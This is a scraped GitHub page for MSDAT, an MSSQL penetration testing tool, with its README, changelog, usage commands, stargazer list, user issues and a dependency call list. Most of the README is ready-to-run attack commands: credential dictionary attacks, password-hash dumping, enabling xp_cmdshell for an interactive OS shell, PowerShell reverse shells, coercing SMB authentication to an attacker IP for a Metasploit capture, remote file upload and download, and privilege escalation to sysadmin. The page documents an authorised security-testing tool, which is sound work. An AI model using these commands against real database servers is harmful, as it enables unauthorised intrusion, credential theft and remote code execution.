quentinhardy / msdat Goto Github PK

MSDAT: Microsoft SQL Database Attacking Tool

Python 100.00%

mssql-database pentest-tool pentest privilege-escalation

msdat's Introduction

Quentin HARDY
[email protected]
[email protected]

MSDAT

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.

Usage examples of MSDAT:

You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the database
You have a valid Microsoft SQL account on a database and you want to escalate your privileges
You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (e.g. xp_cmdshell, OLE Automation, Agent Jobs)

Tested on Microsof SQL database 2005, 2008, 2012, 2014, 2016 and 2019.

Changelog

Version 2.4 (2022/12/28) :
- 2 new options in search module: --privs and --privs-full for getting current user roles and privileges (e.g. login and database privileges)
- 1 new option in search module: --config for getting database configurations & information (version, databases, users, disable users, stored procecdures, etc)
Version 2.3 (2022/12/18) :
- compataible with Microsoft SQL Server 2019
- new option --schema-dump in search module for extract the schema and save in file (except for default DBs)
- new option --table-dump in search module for extracting all tables and save in file (except for default DBs)
- new option --sql-shell in search module for getting a minimal pseudo SQL shell
Version 2.2 (2022/04/29) :
- --nmap-file and -l can be used in all module and passwordguesser module now. You can give a list of targets with -l or a nmap file with --nmap-file.
- Multiple bug fixes
Version 2.1 (2020/03/04) :
- Option --nmap-file for loading all mssql services from a XML nmap file (python-libnmap has to be installed)
Version 2.0 (2020/03/04) :
- Python 2 to Python 3: MSDAT is compatible with Python 3 only now. Python 2 is not supported.
- Separator option in password guesser module
- Improvements in error catching in --put-file option of xpcmdshell module
- Improvements in reverse shell option of jobs mobule
- OLE automation module - command execution improvements
- OLE automation module - Powershell reverse shell implemented
- new option for printing list of agents jobs and their code: --print-jobs
Version 1.2 (2020/02/26) :
- New method in xpCmdShell module: Upload a binary file with powershell (--put-file)
- Improvement in oleAutomation: upload the file in binary mode instead of text file
Version 1.1 (2019/07/12) :
- many other default credentials. Thanks to https://github.com/govolution/betterdefaultpasslist/
Version 1.0 (2017/02/15) :
- first version realeased

Features

Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can (no exhaustive list):

get technical information (ex: database version) of a MSSQL database without to be authenticated
load a nnmap file for scanning all MSSQL targets
search MSSQL accounts with a dictionnary attack
test each login as password (authentication required)
get a windows shell on the database server with
- xp_cmdshell
- OLE Automation
- Jobs
download files remotely with:
- OLE Automation
- bulkinsert
- openrowset
upload files on the server with:
- OLE Automation
- openrowset
capture a SMB authentication thanks to:
- bulkinsert
- openrowset
- xp_dirtree
- xp_fileexist
- xp-getfiledetails
steal MSSQL hashed password, on an any MSSQL version
scan ports through the database:
- openrowset
execute SQL requests on a remote MSSQL server trough the database (target) with:
- bulkinsert
- openrowset
list files/directories with:
- xp_subdirs
- xp_dirtree
list drives/medias with:
- xp_fixeddrives
- xp_availablemedia
create folder with:
- xp_create_subdir
search sensitive data in tables (e.g. credentials)
get database configuration (databases, users, stored procedures, etc)
extract schema and all tables information
exeucte basic SQL commands in a pseudo SQL shell

Installation

Some dependancies must be installed in order to run MSDAT.

In ubuntu:

sudo apt-get install freetds-dev

or download freetds on http://www.freetds.org/

Install python dependencies:

sudo pip3 install -r requirements.txt
sudo activate-global-python-argcomplete

sudo pip3 install cython colorlog termcolor pymssql argparse python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

Add "use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:

[global]
        # TDS protocol version
        tds version = 8.0
        use ntlmv2 = yes

How to begin

python3 msdat.py -h                                                                                                                                                                                                                                                    2 ⨯
usage: msdat.py [-h] [--version]
                {all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
                ...

               _   _  __  __   _  ___ 
              | \_/ |/ _||  \ / \|_ _|
              | \_/ |\_ \| o ) o || | 
              |_| |_||__/|__/|_n_||_| 
                        
------------------------------------------------------
 _   _  __            __           _           ___ 
| \_/ |/ _|         |  \         / \         |_ _|
| \_/ |\_ \         | o )         o |         | | 
|_| |_||__/icrosoft |__/atabase |_n_|ttacking |_|ool 
                        
-------------------------------------------------------

By Quentin Hardy ([email protected])

positional arguments:
  {all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
                        
                        Choose a main command
    all                 to run all modules in order to know what it is possible to do
    mssqlinfo           to get information without authentication
    passwordguesser     to know valid credentials
    passwordstealer     to get hashed passowrds
    xpcmdshell          to get a shell
    jobs                to execute system commands
    smbauthcapture      to capture a SMB authentication
    oleautomation       to read/write file and execute system commands
    bulkopen            to read a file and scan ports
    xpdirectory         to list files/drives and to create directories
    trustworthype       to become sysadmin with the trustwothy database method
    userlikepwd         to try each MSSQL username stored in the DB like the corresponding pwd
    search              to search in column names
    cleaner             clean local traces

optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit

Examples

Modules

You can list all modules:

./msdat.py -h

When you have chosen a module (example: all), you can use it and you can list all features and options of the module:

./msdat.py all -h

You can know if a specific module can be used on a MSSQL server thanks to the --test-module option. This options is implemented in each mdat module.

all module

The all module allows you to run all modules (depends on options that you have purchased).

python msdat.py all -s $SERVER

If you want:

to use your own account file for the dictionnary attack
try multiple passwords for a user without ask you
to define your own timeout value

./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry

In each module, you can define the charset to use with the --charset option.

mssqlinfo module

To get technical information about a remote MSSQL server without to be authenticated:

./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info

This module uses TDS protocol and SQL browser Server to get information.

passwordguesser module

This module allows you to search valid credentials :

./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search

--force-retry option allows to test multiple passwords for each user without ask you

You can specify your own account file with the --accounts-file option:

./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry

passwordstealer module

To dump hashed passwords :

./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt

This modules has been tested on SQL Server 2000, 2005, 2008 and 2014.

xpcmdshell module

To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell

This previous command give you an interactive shell on the remote database server.

If xp_cmdshell is not enabled, the --enable-xpcmdshell can be used in this module to activate it:

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --disable-xpcmdshell --shell

The --enable-xpcmdshell option enables xp_cmdshell if it is not enabled (not enabled by default).

The --disable-xpcmdshell option disables xp_cmdshell if this one is enabled.

smbauthcapture module

Thanks to this module, you can capture a SMB authentication:

./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE

To capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of metasploit could be used:

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit

The capture command of this module tries to capture a SMB authentication thanks to xp_dirtree, xp_fileexist or xp-getfiledetails procedure.

If you want to choose the SMB authentication procedure to capture the authentication:

./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture 127.0.0.1

You can change the SHARE name with the --share-name option.

oleautomation module

This module can be used to read/write file in the database server.

The following command read the file temp.txt stored in the database server:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'

To write a string in a file (temp.txt) remotely:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'

This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt

Also, you can use this module to upload a file (temp.txt) on the target:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txt

bulkopen module

The module bulkopen can be used :

to read/download files stored on a database server
to scan ports through the database server
to execute SQL requests on a remote MSSQL server through the database

To read a file stored in the target, the following command can be used:

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'"

The --method option can be used to specify the method to use:

bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) or
openrowset(https://msdn.microsoft.com/en-us/library/ms190312.aspx)):

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset

To download a file (C:\Users\Administrator\Desktop\temp.txt):` ``bash ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt


This module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:
```bash
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433,1434 -v

You can scan a range of ports:

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433-1438

This module can be used to execute SQL requests (ex: select @@ServerName) on a remote database server (ex: $SERVER2) through the database ($SERVER):

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'

xpdirectory module

The module xpdirectory can be used:

to list:
files
directories
drives
to check if a file exists
to create a directory

To list files in a specific directory:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'

To list directories in a specific directory:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'

To list drives:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media

To check if a file exist:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'

To create a directory:

./msdat.py xpdirectory --s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'

search module

The module search can be used to search a pattern in column names of tables and views. Usefull to search the pattern %password% in column names for example.

To get column names which contains password patterns (ex: passwd, password, motdepasse, clave):

./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

If you want to see column names which doesn't contain a data, you should use the option --show-empty-columns.

To search a specific pattern in column names of views and tables:

./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

Donation

If you want to support my work doing a donation, I will appreciate a lot:

Via BTC: 36FugL6SnFrFfbVXRPcJATK9GsXEY6mJbf

msdat's People

Contributors

Stargazers

Watchers

Forkers

gdraperi sukelluskello jack51706 techlord-rce shaunstanislauslau securycore r3dfruitrollup pentestingxroot av1080p idkwim c0dak 3453-315h clicknull slowmistio popk expertasif johnjohnsp1 sentinelleader zuphzuph hybridious bronx205 projectboot tamer-gamal rich-roth bravery9 luciany minkione grepsecurity zshell incredibleindishell b1gw00d xkon proxyergo y0d4a arschlochnop zhuyue1314 cjjduck coderx7 mucomplex xc3pti0n jbarcia wisdark ykankaya chouaibhm diggold mgcfish dannymas byr0nchan qsdj harry1080 deelmind samyoyo weeshlow qianniaoge akiraaisha jdiazmx notsoethical seabreg orf53975 jothatron shangadi 1337g xuacker dm2333 p01ice greatspider135 limkokholefork 30579096 sgachies totoroha c4nnibal mrtchuss raystyle modulexcite sry309 acv147258369 4n6strider bh4nut3j4 juan157 dreroc freeide 0x6b7966 vvring mmg1 mrbez netredo imulmul tquentin flywithoutwings kaisaryousuf swarupsro doanhnhq 5l1v3r1 mpgn mesutozsoycom l0gan jochimin88 mokhtaralgholi huangzccn monopole-zh

msdat's Issues

missing dependency pyodbc

The documentation fails to mention that you need to do sudo pip install pyodbc

wordlist account format

what a format for wordlist accept by passwordguesser ?
in the example : sa/sa
what the meaning ? thank ..

xp_cmdshell Run Specific Command

My team uses msdat non-interactively against a ton of machines using GNU's parallel command. It'd be nice if the xp_cmdshell module supported running a specific user provided command such as whoami rather than prompting for an interactive session/command. Both options WOULD be nice to have. Having this feature would allow us to more easily test plenty of MSSQL servers over running one at a time.

Add requirements.txt

Add a requirements.txt file for easy Python module dependency clarification

Multiple Server Support

It would be cool if we added a flag such as -sL to run the intended module(s) against multiple servers at once. I am already wrapping msdat in a Bash script. This would be a line delimited text file of servers rather than a nmap input file.

I see that multiple hosts are supported for password guessing:

PPpassguesser.add_argument('-l', dest='hostlist', required=False, help='filename which contains hosts (one ip on each line: "ip:port" or "ip" only)')

No module named pymssql

hi there, could you please help me with this
root@kali:/Downloads/mssql/msdat# ./msdat.py -h
Traceback (most recent call last):
File "./msdat.py", line 10, in
from Mssql import Mssql
File "/root/Downloads/mssql/msdat/Mssql.py", line 6, in
import pymssql, _mssql, decimal
ImportError: No module named pymssql
root@kali:/Downloads/mssql/msdat# pip3 install pymssql
Requirement already satisfied: pymssql in /usr/local/lib/python3.8/dist-packages (2.1.5)

xp_cmdshell Restore Service to Identified State

My team uses msdat non-interactively against a ton of machines using GNU's parallel command. We like to check and see if xp_cmdshell can be executed. Currently xp_cmdshell allows the user to enable or disable the xp. However, I'd like to be able to restore the xp_cmdshell to how we found it so that I am not leaving xp_cmdshell enabled if was already disabled on client environments.

So the breakdown would be:

If xp_cmdshell is disabled and can be enabled:
1. Enable
2. Execute
3. Disable
If xp_cmdshell is enabled:
1. Execute

Project dependencies may have API risk issues

Hi, In msdat, inappropriate dependency versioning constraints can cause risks.

Below are the dependencies and version constraints that the project is using

cython
colorlog
termcolor
pymssql
argparse
python-libnmap
argcomplete

The version constraint == will introduce the risk of dependency conflicts because the scope of dependencies is too strict.
The version constraint No Upper Bound and * will introduce the risk of the missing API Error because the latest version of the dependencies may remove some APIs.

After further analysis, in this project,
The version constraint of dependency cython can be changed to ==3.0.0a10.
The version constraint of dependency colorlog can be changed to >=0.1,<=0.4.
The version constraint of dependency colorlog can be changed to >=1.4,<=1.8.
The version constraint of dependency colorlog can be changed to >=6.3.0a1,<=6.6.0.
The version constraint of dependency argparse can be changed to >=1.2.1,<=1.4.0.
The version constraint of dependency argcomplete can be changed to >=0.1.7,<=0.7.1.

The above modification suggestions can reduce the dependency conflicts as much as possible,
and introduce the latest version as much as possible without calling Error in the projects.

The invocation of the current project includes all the following methods.

The calling methods from the cython

queue.Queue

The calling methods from the colorlog

colorlog.ColoredFormatter

The calling methods from the argparse

argparse.ArgumentParser
argparse.ArgumentParser.parse_args
argparse.HelpFormatter
argparse.ArgumentParser.add_subparsers

The calling methods from the argcomplete

argcomplete.autocomplete

The calling methods from the all methods

iw.r.update
self.__saveThisLoginInFileIfNotExist__
self.args.close
Xpcmdshell.testAll
functools.reduce
next
LAST_RUN_OUTCOME.items
self.readFile
self.useThisDB
map
productVersion.append
self.tryToCaptureASmbAuthentication
search.searchInColumnNames.add_rows
argparse.ArgumentParser.testAll
self.nb.get
self.header
R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format
marked_width.m.rjust
socket.socket.connect
MssqlInfo.__getRemoteVersionThroughSQLServerBrowser__
TrustworthyPE.testAll
os.popen.read.split
Jobs.getInteractiveReverseShell
self.REQ_EXEC_SYS_CMD.format
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace.replace
Search
self.captureSMBAuthenticationViaXpDirtree
accounts.append
pymssql.connect
self.fd.write
join
Passwordstealer
self.getUsernamesViaSuserName
getHostsFromFile.append
self._splitit
self.REQ_OPENROWSET_REMOTE_CONNECTION.format
ScanPorts.scanAPort
socket.inet_aton
base64.b64encode
re.findall
bulkOpen.searchValideAccounts.append
self.reset
TrustworthyPE.TrustworthyPE.connect
BulkOpen.readFileViaOpenRowSet
self.REQ_READ_FILE.format
BulkOpen.remoteConnectionWithOpenrowset
self.__getUsernames__
Jobs.Jobs.testAll
Utils.generateUniqueName
math.ceil
self.writeFileBinary
_thread.exit
OleAutomation.putFile
bytes.fromhex
os.walk
usern.lower
hasattr
self.__getAnExampleOfValueForAColumn__
anAccount.startswith
threading.Thread.start
ports.split.append
self.set_chars
cells.append
self.args.execute
data.str.split
self.REQ_SMB_AUTHENTICATION_VIA_XP_FILEEXIST.format
self.isFileExistViaXpFileexist
XpDirectory.listFilesViaXpDirtree
logging.getLogger.setLevel
signal.signal
self.execSP
self.waitSomeSecs
self._check_align
XpDirectory.isFileExistViaXpFileexist
datetime.datetime.now.strftime
range
self.REQ_GET_COLUMNS_IN_TABLES.format
argparse.HelpFormatter
SMBAuthenticationCapture.captureSMBAuthenticationViaXpGetFileDetails
self.update
maxvalue.ETA.Bar.Percentage.ProgressBar.start
queue.Queue
repr
UsernameLikePassword.tryUsernameLikePassword
args.badNews
os.path.join
BulkOpen.closeConnection
isinstance
search.searchInColumnNames.draw
self.getJobs
self._compute_cols_width
Search.searchInColumnNames
PS_CMD_WRITE_CREATE.format
re.compile.match
usern.upper
self.REQ_USE_THIS_DB.format
marked_width.m.ljust
Jobs.testAll
XpDirectory.closeConnection
self.__getRemoteVersionThroughTDSResponse__
ScanPorts.scanAPort.start
currentFile.lower.endswith
threading.Thread.__init__
argparse.ArgumentParser.parse_args
re.compile.sub.extend
dict.badNews
Jobs.createAndExecuteJob
Utils.getStandardBarStarted
e.replace
argparse.ArgumentParser
self._has_border
logging.StreamHandler
Search.closeConnection
NC_CMD.format
self.marker.update
OleAutomation.OleAutomation
OleAutomation.getFile
self.stealHashedPasswords
self._format_marker
BulkOpen.readFileViaBulkinsert
strg.replace.replace
logging.StreamHandler.setFormatter
type
self.getCompleteVersion
os.popen
resultsToTable.append
ArraySizeError
self._hline
XpDirectory.testAll
anAccountIsGiven
fcntl.ioctl
getScreenSize
parser.parse_args.func
oleAutomation.putFile.encode
sorted
search.searchInColumnNames.count
runBulkInsertForGet
self.listDrivesViaXpAvailableMedia
datetime.datetime.now
runBulkInsertForRead
checkOptionsGivenByTheUser
BulkOpen
Utils.getPSReverseShellCodeEncoded
Passwordstealer.printPasswords
self.listDirectoriesViaXpSubdirs
self._build_hline
logging.info
Xpcmdshell.uploadFileWithPowershell
BulkOpen.searchValideAccounts
aRawData.base64.b64encode.decode
XpDirectory.createSubDiViaXpCreateSubdir
PasswordGuesser.searchValideAccounts
self.REQ_EXEC_SP_FOR_PE.format
max
ValueError
self.deleteSP
self._rows.append
self.__createJob__
self.readFileViaOpenRowSet
socket.socket.sendall
configureLogging
self.REQ_EXEC_JOB.format
OleAutomation.readFile
threading.Thread
UsernameLikePassword
argparse.ArgumentParser.add_subparsers
strg.replace
self.createAndExecuteJob
self._has_vlines.join
self.remoteConnectionWithOpenrowset
main
R_SHELL_COMMAND_POWERSHELL.format
MssqlInfo.returnPrintableStringFromDict
Percentage
ansi_keep.pop
self.__setJob__
self._has_hlines
parser.add_subparsers.add_parser
self._format_line
self.handle_resize
self.executeRequest
self.allUsernames.append
Search.isEmptyTable
re.compile.sub
Passwordstealer.stealHashedPasswords
self.__getJobStatusValue__
cleanString
pbar.percentage
time.time
format
Jobs.getJobStatus
argcomplete.autocomplete
BulkOpen.scanPortsWithOpenrowset
Jobs.printJobs
self._has_header
selectData.append
self.executeCmd
socket.socket
self.args.fetchall
Xpcmdshell.Xpcmdshell.testAll
struct.pack
self.tryPE
results.insert
self._len_cell
Utils.getScreenSize
range.append
Xpcmdshell.enableXpcmdshell
self.REQ_DROP_TABLE.format
texttable.Texttable.add_rows
getHostsFromFile
self.REQ_WRITE_FILE.format
OleAutomation.connect
enumerate
BulkOpen.getFileViaOpenRowSet
self.queueLock.acquire
self._check_row_size
OleAutomation.getInteractiveReverseShell
TrustworthyPE.TrustworthyPE
os.remove
self.OUTPUT_FORMAT_XP_DIRTREE.format
aHost.cleanString.split
self.VERSIONS.items
Passwordstealer.testAll
dict.bigTitle
self.__getAccounts__
self.nb.get.put
BulkOpen.disableAdHocDistributedQueries
self.getStandardBarStarted
anAccount.hex
print
self.args.title
Passwordstealer.closeConnection
self.__dropSysadminPriv__
self.captureSMBAuthenticationViaXpFileexist
texttable.Texttable.set_deco
self.isThe2005Version
pbar.update
SMBAuthenticationCapture.SMBAuthenticationCapture
strg.replace.replace.replace
re.compile
Xpcmdshell.closeConnection
socket.gethostbyname
utf16LEPayloadBytes.base64.b64encode.decode
MssqlInfo
list
self.getJobStatus
termcolor.colored
array.array
subparsers.add_parser.set_defaults
Mssql.Mssql
R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format.encode
sys.exit
self.portStatusQueue.put
libnmap.parser.NmapParser.parse_fromfile
iter
runAllModules
self.output.printOSCmdOutput
PS_CMD_WRITE_APPEND.format
Mssql.Mssql.connect
Jobs
self.REQ_GET_COLUMNS_IN_VIEWS.format
values.append
self.REQ_XPCMDSHELL_CMD.format
open.write
self.__askToTheUserIfNeedToContinue__
UsernameLikePassword.runUsernameLikePassword
zip
line_wrapped.append
passwords.append
self.REQ_BULK_INSERT.format
anOperationHasBeenChosen
XpDirectory
runPasswordGuesserModuleOnAHost
Xpcmdshell.connect
str
Utils.ipOrNameServerHasBeenGiven
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace
open
connectionInformation.keys
os.path.dirname
XpDirectory.connect
sys.stderr.write
Passwordstealer.Passwordstealer.testAll
TrustworthyPE.cleanPE
self.accounts.append
Exception.__init__
float
self.disableXpcmdshell
Jobs.Jobs
w.update
OleAutomation
Utils.databaseHasBeenGiven
OleAutomation.OleAutomation.testAll
Xpcmdshell.getInteractiveShell
texttable.Texttable
self.REQ_WRITE_FILE_BINARY.format
self.getRemoteDatabaseVersion
len
Utils.cleanString
Passwordstealer.Passwordstealer
self._str
dict
anAccount.endswith
self.REQ_XP_FILEEXIST.format
self.__dropTable__
args.title
Xpcmdshell.disableXpcmdshell
self.enableAdHocDistributedQueries
logging.getLogger
logging.critical
SMBAuthenticationCapture.captureSMBAuthenticationViaXpDirtree
SMBAuthenticationCapture.testAll
self.readFileViaBulkinsert
itertools.zip_longest
self.REQ_DROP_PRIV.format
OleAutomation.writeFile
portsQueue.join
int
SMBAuthenticationCapture.tryToCaptureASmbAuthentication
optik.textwrap.wrap
databases.append
currentFile.lower
Search.connect
args.goodNews
validAccountsList.items
r.append
Xpcmdshell.Xpcmdshell
time.strftime
ProgressBar
self.queueLock.release
self.__getRemoteVersionThroughSQLServerBrowser__
self.OUTPUT_MEDIA.format
self.isThe2012Version
open.read
self.REQ_STEP_JOB.format
input
self.disableAdHocDistributedQueries
PasswordGuesser.PasswordGuesser.searchValideAccounts
self.__searchPatternInColumnNamesOfViews__
SMBAuthenticationCapture
SMBAuthenticationCapture.SMBAuthenticationCapture.testAll
self.portsQueue.empty
input.lower
self.__searchPatternInColumnNamesOfTables__
OleAutomation.disableOLEAutomationProcedures
XpDirectory.XpDirectory
validAccounts.append
self.nb.put
socket.socket.recv
self.__createStoredProcToPE__
self.isCurrentUserSysadmin
self.format_time
self.__getPasswords__
TrustworthyPE.TrustworthyPE.testAll
argparse.ArgumentParser.add_argument
self.captureSMBAuthenticationViaXpGetFileDetails
self.createSubDiViaXpCreateSubdir
search.searchInColumnNames.set_deco
self._format_widgets
XpDirectory.listDrivesViaXpAvailableMedia
self.REQ_XP_CREATE_SUBDIR.format
self.__addJob__
OleAutomation.closeConnection
self.getCurrentUser
self.__isFileNotExist__
time.sleep
socket.socket.settimeout
OleAutomation.testAll
self.pbar.update
self.isThe2008Version
self.scannerObject.remoteConnectionWithOpenrowset
ScanPorts.ScanPorts.printScanPortResults
self.__execJob__
Utils.getBinaryDataFromFile
args.subtitle
BulkOpen.BulkOpen.testAll
self.REQ_CREATE_TABLE.format
runBulkInsertForGet.encode
socket.socket.sendto
ports.split
self.executeSysCmd
re.compile.sub.split
self.REQ_ADD_JOB.format
l.replace.replace.replace
self.__loadCompleteVersionIfNeed__
status.str.replace
BulkOpen.testAll
Xpcmdshell
args.unknownNews
portsQueue.put
l.cleanString.split
mssqlRawData.rfind
self._splitit.split
TrustworthyPE.isCurrentUserSysadmin
Utils.putDataToFile
self.__delJob__
hfill_inds.append
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace
SMBAuthenticationCapture.captureSMBAuthenticationViaXpFileexist
self.REQ_GET_VALUE_IN_COLUMN.format
self.percentage
OleAutomation.executeSysCmd
PasswordGuesser.getHostsFromFile
self.__loadAllUsernames__
Output.Output
self.REQ_SMB_AUTHENTICATION_VIA_XP_GETFILEDETAILS.format
self.REQ_CREATE_JOB.format
self.add_row
open.readlines
self._hline_header
self.__getTrustworthyDBs__
aService.service.lower
Passwordstealer.connect
self.enableXpcmdshell
open.close
XpDirectory.listDrivesViaXpFixedDrives
ScanPorts.ScanPorts.scanTcpPorts
self._draw_line
BulkOpen.BulkOpen.closeConnection
threading.Lock
BulkOpen.enableAdHocDistributedQueries
self.REQ_SMB_AUTHENTICATION_VIA_XP_DIRTREE.format
self._format_widgets.join.ljust
self.args.cursor
self.REQ_XP_SUBDIRS.format
Bar
Utils.checkOptionsGivenByTheUser
logging.Formatter
self.args.unknownNews
OleAutomation.enableOLEAutomationProcedures
time.gmtime
validUsers.append
SMBAuthenticationCapture.connect
Utils.getCredentialsFormated
Jobs.connect
ScanPorts.ScanPorts
self.OUTPUT_DRIVES.format
self.__createTable__
self._need_update
struct.unpack
self.__getJobStatus__
database.connectionInformation.append
BulkOpen.BulkOpen
self.writeFile
UsernameLikePassword.connect
os.path.isfile
os.path.isdir
ansi_keep.append
self.REQ_XP_DIRTREE.format
dict.title
self.REQ_STORED_PROC_TO_SYSADMIN.format
dict.goodNews
logging.debug
self.args.badNews
MssqlInfo.__getRemoteVersionThroughTDSResponse__
os.path.abspath
self.isThe2000Version
self.REQ_GET_STATUS.format
dict.items
self.REQ_OPENROWSET.format
ipOrNameServerHasBeenGiven
XpDirectory.listDirectoriesViaXpSubdirs
BulkOpen.connect
certificateBasedSQLServerLogins.append
l.replace.replace
pbar.finish
self.REQ_READ_LINES.format
self.cleanPE
TrustworthyPE.tryPE
ports.isdigit
os.mkdir
self.isThe2014Version
self._has_vlines
self.enableOLEAutomationProcedures
Utils.cleanString.replace
runOpenRowSetForGet
self.listDrivesViaXpFixedDrives
Utils.ErrorClass
self.REQ_IS_A_VALID_USERNAME.format
logging.getLogger.addHandler
TrustworthyPE.connect
TrustworthyPE
input.replace
ETA
parser.parse_args._get_kwargs
self.REQ_DEL_PROC.format
f.read.encode
self.REQ_DEL_JOB.format
random.randrange
list.extend
self.args.autocommit
cleanList.append
self.args.goodNews
aDictionary.items
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace.replace
logging.warning
self.listFilesViaXpDirtree
self.args.subtitle
self.portsQueue.get
self.__getProductNameFromVersion__
BulkOpen.getFileViaBulkinsert
PasswordGuesser
self.REQ_GET_USERNAME.format
x.encode
askToContinue
colorlog.ColoredFormatter
SMBAuthenticationCapture.closeConnection
logging.error
iterable.__len__
Mssql.Mssql.__init__
runOpenRowSetForRead
PasswordGuesser.PasswordGuesser
self.portsQueue.task_done
os.popen.read
Mssql.Mssql.closeConnection
Passwordstealer.credentialsAreEmpty
texttable.Texttable.draw
usernames.append
subprocess.call

@developer
Could please help me check this issue?
May I pull a request to fix it?
Thank you very much.

Output/Log to File

I would like the tool to output results to file. Understanding this tool has many different modules, a standardized machine readable file type such as CSV may be difficult. However, having the tool output timestamps of actions and results would allow the tool to be run with persistent results. I see that something was started here, but was commented out:

#PPoutput.add_argument('--output-file',dest='outputFile',default=None,required=False,help='save results in this file')

xp_dirtree Incorrect Result

Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported:

I used impacket-mssclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share' which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holds public access only.

Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?